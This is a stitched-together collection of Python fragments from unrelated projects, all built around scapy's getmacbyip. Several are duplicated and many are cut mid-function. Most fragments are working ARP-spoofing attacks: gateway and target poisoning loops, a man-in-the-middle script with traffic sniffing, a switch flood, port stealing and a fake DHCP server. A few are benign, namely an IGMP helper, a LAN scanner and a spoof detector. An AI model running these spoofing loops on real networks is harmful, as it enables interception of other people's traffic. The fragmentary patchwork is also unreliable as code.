def exploit(gateway, ip):
gmac = getmacbyip(gateway)
ipmac = getmacbyip(ip)
packet1 = ARP(op=2, pdst=ip, psrc=gateway, hwdst=gmac)
packet2 = ARP(op=2, pdst=gateway, psrc=ip, hwdst=ipmac)
for pack in [packet1, packet2]:
send(pack, verbose=False)
return ipmac, gmac
def arpspoof(target='192.168.2.16', host='192.168.2.1', interface='eth2'):
while True:
pkt_target = Ether() / ARP(op='is-at',
psrc=host,
pdst=target,
hwsrc=get_if_hwaddr(interface),
hwdst=getmacbyip(target))
pkt_host = Ether() / ARP(op='is-at',
psrc=target,
pdst=host,
hwsrc=get_if_hwaddr(interface),
hwdst=getmacbyip(host))
sendp(pkt_target)
sendp(pkt_host)
time.sleep(3)
def restore(gateway, ip):
packet1 = ARP(op=2,
pdst=gateway,
psrc=ip,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=getmacbyip(ip))
packet2 = ARP(op=2,
pdst=ip,
psrc=gateway,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=getmacbyip(gateway))
for pack in [packet1, packet2]:
send(pack, verbose=False)
def igmpize(self):
"""Called to explicitly fixup the packet according to the IGMP RFC
The rules are:
- General:
1. the Max Response time is meaningful only in Membership Queries and should be zero
- IP:
1. Send General Group Query to 224.0.0.1 (all systems)
2. Send Leave Group to 224.0.0.2 (all routers)
3a.Otherwise send the packet to the group address
3b.Send reports/joins to the group address
4. ttl = 1 (RFC 2236, section 2)
5. send the packet with the router alert IP option (RFC 2236, section 2)
- Ether:
1. Recalculate destination
Returns:
True The tuple ether/ip/self passed all check and represents
a proper IGMP packet.
False One of more validation checks failed and no fields
were adjusted.
The function will examine the IGMP message to assure proper format.
Corrections will be attempted if possible. The IP header is then properly
adjusted to ensure correct formatting and assignment. The Ethernet header
is then adjusted to the proper IGMP packet format.
"""
from scapy.contrib.igmpv3 import IGMPv3
gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0" # noqa: E501
underlayer = self.underlayer
if self.type not in [0x11, 0x30]: # General Rule 1 # noqa: E501
self.mrcode = 0
if isinstance(underlayer, IP):
if (self.type == 0x11):
if (gaddr == "0.0.0.0"):
underlayer.dst = "224.0.0.1" # IP rule 1 # noqa: E501
elif isValidMCAddr(gaddr):
underlayer.dst = gaddr # IP rule 3a # noqa: E501
else:
warning("Invalid IGMP Group Address detected !")
return False
elif ((self.type == 0x17) and isValidMCAddr(gaddr)):
underlayer.dst = "224.0.0.2" # IP rule 2 # noqa: E501
elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)): # noqa: E501
underlayer.dst = gaddr # IP rule 3b # noqa: E501
elif (self.type in [0x11, 0x22, 0x30, 0x31, 0x32] and isinstance(self, IGMPv3)):
pass
else:
warning("Invalid IGMP Type detected !")
return False
if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options): # noqa: E501
underlayer.options.append(IPOption_Router_Alert())
underlayer.ttl = 1 # IP rule 4
_root = self.firstlayer()
if _root.haslayer(Ether):
# Force recalculate Ether dst
_root[Ether].dst = getmacbyip(underlayer.dst) # Ether rule 1 # noqa: E501
if isinstance(self, IGMPv3):
self.encode_maxrespcode()
return True
def main():
len_arg = len(sys.argv)
i = 0
flag_help = True
while i != len_arg:
if sys.argv[i] == '-h':
help_function()
flag_help = False
break
i += 1
if flag_help:
i = 0
interface = conf.iface
while i != len_arg:
if sys.argv[i] == '-i':
interface = sys.argv[i + 1]
break
i += 1
source = get_if_addr(conf.iface)
i = 0
while i != len_arg:
if sys.argv[i] == '-s':
source = sys.argv[i + 1]
i += 1
i = 0
delay = 0
while i != len_arg:
if sys.argv[i] == '-d':
delay = sys.argv[i + 1]
delay = float(delay)
i += 1
gw = False
i = 0
while i != len_arg:
if sys.argv[i] == '-gw':
gw = True
i += 1
i = 0
targetIp = ""
while i != len_arg:
if sys.argv[i] == '-t':
targetIp = sys.argv[i + 1]
i += 1
gatewayIP = get_gateway_ip()
gatewayMAC = getmacbyip(gatewayIP)
while True:
myMac = get_if_hwaddr(interface)
fake_gateway(targetIp, myMac, gatewayIP)
if gw:
fake_client(targetIp, gatewayIP, myMac, gatewayMAC)
time.sleep(delay)
def initialize(self):
util.Msg("Starting switch flood...")
self.switch = getmacbyip(self.config['target'].value)
self.running = True
thread = Thread(target=self.spam)
thread.start()
return True
def initialize(self):
util.Msg("Starting switch flood...")
self.switch = getmacbyip(self.config['target'].value)
self.running = True
thread = Thread(target=self.spam)
thread.start()
return True
def fake_gateway(ip, myMac, gatewayIP):
# Sends a message to each host in the LAN indicating I'm a gateway.
targetMAC = getmacbyip(ip)
arp_response = ARP(pdst=ip,
hwdst=targetMAC,
psrc=gatewayIP,
hwsrc=myMac,
op='is-at')
send(arp_response)
def get_mac(tgt_ip):
'''
调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。
'''
tgt_mac = getmacbyip(tgt_ip)
if tgt_mac is not None:
return tgt_mac
else:
print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
def igmpize(self):
"""Called to explicitly fixup the packet according to the IGMP RFC
The rules are:
General:
1. the Max Response time is meaningful only in Membership Queries and should be zero # noqa: E501
IP:
1. Send General Group Query to 224.0.0.1 (all systems)
2. Send Leave Group to 224.0.0.2 (all routers)
3a.Otherwise send the packet to the group address
3b.Send reports/joins to the group address
4. ttl = 1 (RFC 2236, section 2)
5. send the packet with the router alert IP option (RFC 2236, section 2) # noqa: E501
Ether:
1. Recalculate destination
Returns:
True The tuple ether/ip/self passed all check and represents
a proper IGMP packet.
False One of more validation checks failed and no fields
were adjusted.
The function will examine the IGMP message to assure proper format.
Corrections will be attempted if possible. The IP header is then properly # noqa: E501
adjusted to ensure correct formatting and assignment. The Ethernet header # noqa: E501
is then adjusted to the proper IGMP packet format.
"""
gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0" # noqa: E501
underlayer = self.underlayer
if self.type not in [0x11, 0x30]: # General Rule 1 # noqa: E501
self.mrcode = 0
if isinstance(underlayer, IP):
if (self.type == 0x11):
if (gaddr == "0.0.0.0"):
underlayer.dst = "224.0.0.1" # IP rule 1 # noqa: E501
elif isValidMCAddr(gaddr):
underlayer.dst = gaddr # IP rule 3a # noqa: E501
else:
warning("Invalid IGMP Group Address detected !")
return False
elif ((self.type == 0x17) and isValidMCAddr(gaddr)):
underlayer.dst = "224.0.0.2" # IP rule 2 # noqa: E501
elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)): # noqa: E501
underlayer.dst = gaddr # IP rule 3b # noqa: E501
else:
warning("Invalid IGMP Type detected !")
return False
if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options): # noqa: E501
underlayer.options.append(IPOption_Router_Alert())
_root = self.firstlayer()
if _root.haslayer(Ether):
# Force recalculate Ether dst
_root[Ether].dst = getmacbyip(underlayer.dst) # Ether rule 1 # noqa: E501
from scapy.contrib.igmpv3 import IGMPv3
if isinstance(self, IGMPv3):
self.encode_maxrespcode()
return True
def getTargetMac(targetIP):
targetMac = None
for i in range(3):
if not targetMac:
targetMac = getmacbyip(targetIP)
else:
print("Target: %s MAC address is %s" % (targetIP, targetMac))
# 返回目标mac值
return targetMac
print("Can't get Target:%s MAC address" % targetIP)
return None
def initialize(self):
try:
util.Msg('[enter] for broadcast')
self.switch = raw_input('[!] Enter switch address: ')
if self.switch == '': self.switch = 'FF:FF:FF:FF:FF:FF'
else: self.switch = getmacbyip(self.switch)
except: return None
self.running = True
thread = Thread(target=self.spam)
thread.start()
return 'Spamming %s'%(self.switch)
def _get_mac_address_of_ip(self, ip_addr: IPAddress):
if ip_addr.version == IPAddress.IPV4:
ip_str = socket.inet_ntop(socket.AF_INET, ip_addr.address)
addr_str = getmacbyip(ip_str)
else:
ip_str = socket.inet_ntop(socket.AF_INET6, ip_addr.address)
addr_str = getmacbyip6(ip_str)
if not addr_str:
LOG.error("Coudn't find mac for IP: %s, disabling ebpf" % (ip_str))
return None
LOG.debug("IP: %s, mac: %s" % (ip_str, addr_str))
return self._pack_mac_addr(addr_str)
def send_packet(self, tcp_packet):
with self._lock:
interface = Route().route(tcp_packet.destination_ip)[0]
ip_packet = IPPacket(source_ip_addr=tcp_packet.source_ip,
destination_ip_addr=tcp_packet.destination_ip,
payload=tcp_packet.serialize())
ethernet_packet = EthernetPacket(
source_mac=get_if_hwaddr(interface),
destination_mac=getmacbyip(tcp_packet.destination_ip),
protocol=ETH_P_IP,
payload=ip_packet.serialize())
self.interface_socket.sendto(
ethernet_packet.serialize(),
(Route().route(tcp_packet.destination_ip)[0], ETH_P_ALL))
def test_agent_agent_attack():
netcard = 'Broadcom 802.11n 网络适配器'
gw_ip = '192.168.123.1'
target_ip = '192.168.123.224'
temp = get_gw_and_self(netcard, gw_ip)
self_ip = temp.get('self_ip')
self_mac = temp.get('self_mac')
target_mac = getmacbyip(target_ip)
gw_mac = temp.get('gw_mac')
# 欺骗目标本机为网关
trick_taget = Ether(dst=target_mac, src=self_mac) / ARP(
op=2, psrc=gw_ip, hwsrc=self_mac, hwdst=target_mac)
# 欺骗网关本机为目标
trick_gateway = Ether(dst=gw_mac, src=self_mac) / ARP(
op=2, psrc=target_ip, hwsrc=self_mac, hwdst=gw_mac)
t = int(input("请输入攻击时间间隔(秒):"))
tricker = MTread('tricker', agent_attack_cell, trick_taget, trick_gateway,
t)
tricker.start()
# threading.Thread
mfilter = "!arp and host " + target_ip
mprn = lambda pkt: pack(pkt, self_mac, target_mac, gw_mac)
# sniffer = MTread('sniffer', snifer_shell, mfilter, mprn)
# sniffer.start()
threading.Thread(name='sniffer', target=snifer_shell, args=[mfilter,
mprn]).start()
print("攻击开始,目标ip %s,目标Mac %s" % (target_ip, target_mac))
print('您可输入数字命令控制任务:')
print("stop trick: 0, pause trick: 1,resume trick: 2")
f0 = 1 # running state
while 1:
f1 = int(input("cmd(a number): "))
if f0 == 1: # stop or pause
if f1 == 1:
tricker.pause()
f0 = 0 # paused
print('tricker已暂停')
elif f1 == 0:
tricker.stop() # stopped
break
elif f0 == 0:
if f1 == 2:
tricker.resume() # resume -> running
f0 = 1
print('tricker已恢复')
print('已停止')
def run():
if os.geteuid() != 0:
print("Root required for operation")
sys.exit(1)
# Get the native MAC by specified interface
native_mac = getmac.get_mac_address(interface)
if not native_mac:
print("The specified interface does not exist")
sys.exit()
target_mac = getmacbyip(target_ip)
if not target_mac:
print("The specified target does not exist")
sys.exit()
gateway_mac = getmacbyip(gateway_ip)
if not gateway_mac:
print("The specified gateway does not exist")
sys.exit()
while 1:
try:
spoof(native_mac, target_mac, gateway_mac)
time.sleep(1.5)
except KeyboardInterrupt:
restore(target_mac, gateway_mac)
break
def getMacAddress(self, ip="0.0.0.0"):
try:
mac = l2.getmacbyip(ip)
if mac == "ff:ff:ff:ff:ff:ff" or mac == "00:00:00:00:00:00":
# tested only on Mac OS, and not working pretty well with virtual interfaces, like virtualbox interfaces
interface = psutil.net_if_addrs()[
self.comboInterfacesBox.currentText()]
for addr in interface:
if addr.family == psutil.AF_LINK:
return addr.address
return psutil.net_if_addrs()[
self.comboInterfacesBox.currentText()][1].address
else:
return mac
except:
pass
def run(target, victim, interface):
""" This function launch ARP spoof attack in one way
:param target: target ip address
:type target: str
:param victim: victim ip address
:type victim: str
:param interface: interface to be launched the attack
:type interface: str
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target)
try:
while 1:
sendp(p, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def run(target, victim, interface):
""" This function launch ARP spoof attack in one way
:param target: target ip address
:type target: str
:param victim: victim ip address
:type victim: str
:param interface: interface to be launched the attack
:type interface: str
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target)
try:
while 1:
sendp(p, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def __init__(self):
self.__GATEWAY_IP = conf.route.route("0.0.0.0")[2]
self.__GATEWAY_MAC = getmacbyip(self.__GATEWAY_IP)
self.__DHCPServerIp = get_if_addr(conf.iface)
self.__DHCPMac = Ether().src
self.__dictIPS = {}
self.__IPPool = []
self.__fakeDNSServer = "8.8.8.8"
self.__fakeSubnetMask = ""
self.__fakeGatewayIP = self.__DHCPServerIp
self.__leaseTime = 86400
self.__renewalTime = 172800
self.__rebindingTime = 138240
self.__command = ""
def start(ip_target, output_file, interface):
mac_target = getmacbyip(ip_target)
if mac_target == None:
six.print_(colored("[!] ERROR - Can't locate the MAC of that IP", "red"))
exit(0)
global file
file=output_file
#Access control file to check if Port stealing is running. Write PID in file if not.
control_file = open("control_file", "r+")
data=ast.literal_eval(control_file.read())
if data['port_stealing_pid'] == 0:
data['port_stealing_pid'] = getpid()
overWriteFile(control_file, str(data))
else:
six.print_(colored("[!] ERROR - Port Stealing is running", "red"))
control_file.close()
exit(0)
six.print_("[*] Port Stealing STARTED")
port_stealing(ip_target, mac_target, interface)
def __init__(self):
# 保存扫描结果
self.num = -1
self.result = []
# 网卡
pattern = re.compile('\[.*?\]')
self.interFACE = pattern.findall(str(conf.iface))[0].replace(
'[', '').replace(']', '')
# 靶机
self.target_ip = '192.168.1.4'
# 本机ip(攻击机)
self.local_ip = get_ip_from_name(self.interFACE)
# 网关
self.gate_ip = "192.168.1.1"
# 靶机mac
self.target_mac = ''
# 本机mac
self.local_mac = get_if_hwaddr(self.interFACE)
# 网关
self.gate_mac = getmacbyip(self.gate_ip)
def getIPAndMac(ip_range):
result_list = {}
for ip in ip_range:
# 打印生成的目标IP
print("=检测ip=>", ip)
# 根据目标IP组包, ICMP可以看做Ping, 程序员式招呼
p = IP(dst=ip) / ICMP() / b'HelloWorld'
# 将数据包发出, 等待0.3秒,无回应则放弃等待, 屏蔽提示消息
r = sr1(p, timeout=0.3, verbose=False)
# 如果收到了返回的数据包,则存到一个数组中
try:
if r.getlayer(IP).fields['src'] == ip and r.getlayer(
ICMP).fields['type'] == 0:
net_info = {}
mac = l2.getmacbyip(ip)
getcom = Mac()
com = getcom.search(mac)
mac = mac + "|" + str(com)
result_list[str(ip)] = mac
print("成功获取一个mac地址:", ip, mac)
except Exception as e:
pass
return result_list
def start(self):
global socket
self.recv_process = multiprocessing.Process(
target=self.process_receive)
end_time = time.time() + 10
while self.dut_mac == None and time.time() < end_time:
self.dut_mac = getmacbyip(self.sut_ip)
socket = conf.L2socket(iface=self.sut_interface)
self.packet = Ether(dst=self.dut_mac, type=0x6003)
if self.dut_mac == None:
print("[!] Could not determine target MAC address from IP")
sys.exit(1)
self.recv_process.start()
#self.process_receive()
"""
sleep - letting sniffing process initialize
"""
time.sleep(3)
def handle_dhcp_packet(packet):
# Match DHCP discover
if DHCP in packet and packet[DHCP].options[0][1] == 1:
print('---')
print('New DHCP Discover')
#print(packet.summary())
#print(ls(packet))
hostname = get_option(packet[DHCP].options, 'hostname')
mac = packet[Ether].src
if check_whitelist(mac):
print(f'Whitelisted host {hostname} asked for an IP.')
print(f'Host vendor: {mac_vendor.get_str(mac)}')
print(f'Host MAC: {mac}')
return
pal_time()
print_and_log(f"Unknown host {hostname} asked for an IP.")
print_and_log(f'Host vendor: {mac_vendor.get_str(mac)}')
print_and_log(f'Host MAC: {mac}')
# Match DHCP ack
elif DHCP in packet and packet[DHCP].options[0][1] == 5\
and packet[BOOTP].yiaddr != '0.0.0.0':
print('---')
print('New DHCP Ack')
#print(packet.summary())
#print(ls(packet))
subnet_mask = get_option(packet[DHCP].options, 'subnet_mask')
lease_time = get_option(packet[DHCP].options, 'lease_time')
router = get_option(packet[DHCP].options, 'router')
name_server = get_option(packet[DHCP].options, 'name_server')
server_mac = packet[Ether].src
server_ip = packet[IP].src
sus_ip = packet[BOOTP].yiaddr
sus_mac = str(getmacbyip(sus_ip))
sus_vendor = mac_vendor.get_str(sus_mac)
if check_whitelist(sus_mac):
print(
f"DHCP Server {server_ip} ({server_mac}) acknowledged a whitelisted device on IP {sus_ip}"
)
print(f'Host vendor: {mac_vendor.get_str(sus_vendor)}')
print(f'Host MAC: {sus_mac}\n')
return
pal_time()
print_and_log(
f"DHCP Server {server_ip} ({server_mac}) acknowledged unknown device on IP {sus_ip}"
)
print_and_log(f'Unknown host vendor: {mac_vendor.get_str(sus_vendor)}')
print_and_log(f'Unknown host MAC: {sus_mac}\n')
print(f"DHCP Options: subnet_mask: {subnet_mask}, lease_time: "
f"{lease_time}, router: {router}, name_server: {name_server}")
# Match DHCP inform
elif DHCP in packet and packet[DHCP].options[0][1] == 8:
print('---')
print('New DHCP Inform')
#print(packet.summary())
#print(ls(packet))
hostname = get_option(packet[DHCP].options, 'hostname')
vendor_class_id = get_option(packet[DHCP].options, 'vendor_class_id')
print(f"DHCP Inform from {packet[IP].src} ({packet[Ether].src}) "
f"hostname: {hostname}, vendor_class_id: {vendor_class_id}")
else:
print('---')
print('Some Other DHCP Packet')
print(packet.summary())
#print(ls(packet))
return
eth = Ether()
arp = ARP(psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")
pkt = eth / arp
return pkt
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='man in the middle')
parser.add_argument('-t', dest='targetip', type=str, help='target ip')
parser.add_argument('-g', dest='gatewayip', type=str, help='gateway ip')
args = parser.parse_args()
tgt_ip = args.targetip
tgt_mac = getmacbyip(tgt_ip)
gateway_ip = args.gatewayip
gateway_mac = getmacbyip(gateway_ip)
input('enter')
pkt_station = arp(gateway_ip, tgt_mac, tgt_ip)
pkt_gateway = arp(tgt_ip, gateway_mac, gateway_ip)
print(pkt_station.show())
print(pkt_gateway.show())
while True:
sendp(pkt_station)
sendp(pkt_gateway)
time.sleep(1)
import sys
from scapy.layers.l2 import Ether, ARP, sendp
from scapy.layers.l2 import getmacbyip
if __name__ == '__main__':
if len(sys.argv) < 3:
sys.exit(1)
target_ip = sys.argv[1]
host = sys.argv[2]
target_mac = getmacbyip(target_ip)
host_mac = getmacbyip(host)
pkt = Ether() / ARP(
op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac)
print(pkt.show())
try:
sendp(pkt, inter=2, loop=1)
except KeyboardInterrupt:
print('Cleaning...')
sendp(Ether(src=host_mac) / ARP(op='is-at',
psrc=host,
hwsrc=host_mac,
pdst=target_ip,
hwdst=target_mac),
inter=1,
count=3)
import os
import sys
from scapy.layers.l2 import getmacbyip
from scapy.all import (
Ether,
ARP,
sendp
)
ifconfig=os.system('ifconfig')
print ifconfig
gmac=raw_input('Please enter gateway IP:')
liusheng=raw_input('Please enter your IP:')
liusrc=raw_input('Please enter target IP:')
try:
tg=getmacbyip(liusrc)
print tg
except Exception , f:
print '[-]{}'.format(f)
exit()
def arpspoof():
try:
eth=Ether()
arp=ARP(
op="is-at",
hwsrc=gmac,
psrc=liusheng,
hwdst=tg,
pdst=liusrc
)
print ((eth/arp).show())
def check_ip_mac(packet):
if packet[ARP].op == 2:
proposed_IP = packet[ARP].psrc
# print("spoofed")
return not (getmacbyip(proposed_IP) == packet[ARP].hwsrc)
from scapy.layers.l2 import getmacbyip
from scapy.all import (
Ether,
ARP,
sendp
)
#执行查看IP的命令
ifconfig=os.system('ifconfig')
print ifconfig
gmac=raw_input('Please enter gateway IP:')
liusheng=raw_input('Please enter your IP:')
liusrc=raw_input('Please enter target IP:')
try:
#获取目标的mac
tg=getmacbyip(liusrc)
print tg
except Exception , f:
print '[-]{}'.format(f)
exit()
def arpspoof():
try:
eth=Ether()
arp=ARP(
op="is-at", #arp响应
hwsrc=gmac, #网关mac
psrc=liusheng,#网关IP
hwdst=tg,#目标Mac
pdst=liusrc#目标IP
)
#对配置进行输出
def _scapy_ip(ip):
"""Requires root permissions on POSIX platforms.
Windows does not have this limitation."""
from scapy.layers.l2 import getmacbyip
return getmacbyip(ip)
def local_scan():
ipl = get_lan_ip() # Local IP
print('\nYour local IP is: {}'.format(ipl))
if ip_check_local(ipl) is False:
print('Your address does not appear to be from a local network. Aborting scan.')
else:
x = config.ip_list_setting
if x == 3:
print('Skipping ping sweep.')
print('Scanning all IPs in the last IP octet range (like in a /24 subnet).')
ip_list = generate_ips(ipl)
elif x == 2:
print('Skipping ping sweep.')
print('Scanning manually entered IPs.')
ip_list = config.manual_ip_list
else:
print('Ping sweeping the IPs in the last IP octet range (like in a /24 subnet).')
ip_list = ping_sweep.get_ip_list(ipl)
print(ip_list)
data_list = []
open_ports_found = False
open_ports = []
print('Scanning for open ports on found hosts...')
ports_by_ip = multithread_scan(ip_list, port_scan)
print('Acquiring host data...')
start_time = time.time()
for address in ip_list:
mac_addr = str(getmacbyip(address)) # TODO this needs a timeout for optimisation
# This means host was unresponsive
# It only matters when skipping ping sweep
if mac_addr == 'None':
continue
host_data = socket.gethostbyaddr(address)
hostname = host_data[0] # host_data structure is: (name, aliases, [IPs])
vendor = mac_vendor.get_str(mac_addr)
ports = get_ports(address, ports_by_ip)
ports.sort()
ip_data = [
address,
hostname,
ports,
mac_addr,
vendor
]
data_list.append(ip_data)
print("Duration: {} seconds".format(time.time() - start_time))
# TODO sort the data_list
print('\nNote: Your host might return ff:ff:ff:ff:ff:ff.\n')
# Display hosts with found ports
print("{:<15} {:<20} {:<20} {:<35} {}".format('IP', 'Name', 'MAC', 'Vendor', 'List of open ports'))
print("{:<15} {:<20} {:<20} {:<35} {}".format('-'*15, '-'*16, '-'*17, '-'*30, '-'*18))
for entry in data_list:
print("{:<15} {:<20} {:<20} {:<35} {}".format(entry[0], entry[1], entry[3], entry[4], entry[2]))
if len(entry[2]) != 0:
open_ports_found = True
for port in entry[2]:
if port not in open_ports:
open_ports.append(port)
if open_ports_found:
print('\nPorts belonging to potentially vulnerable services have been found on one or more of\n'
'the devices in your local network. Make sure to investigate and close or secure them.')
open_ports.sort()
print('\nThe services on those ports are:')
for port in open_ports:
print('─ {} ({})'.format(port, services.get(port)))
else:
print('\nNo ports belonging to potentially dangerous services have been found.')
if open_ports_found:
decision = 'Y' # input('Grab banners? Enter Y or n \n')
if decision == 'Y':
print('Grabbing banners for all services. This might take a minute...')
banner_data = multithread_scan(ports_by_ip, banner_grab)
#pprint.pprint(banner_data)
for row in banner_data:
ip_address = row[0]
host_data = socket.gethostbyaddr(ip_address)
hostname = host_data[0]
banner_by_port_list = row[1]
print('{} ({})'.format(ip_address, hostname))
for entry in banner_by_port_list:
port = entry[0]
banner = entry[1]
print('\tPort: {}'.format(port))
print('\t\t{}'.format(banner))
def main():
# sniff(filter='icmp', prn=prn)
print getmacbyip('192.168.56.16')
def get_mac(tgt_ip):
tgt_mac = getmacbyip(tgt_ip)
if tgt_mac is not None:
return tgt_mac
else:
print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
def getway():
c = netifaces.gateways()
gate = c["default"][2][0]
gate_mac = getmacbyip(gate)
return c["default"][2][0], gate_mac
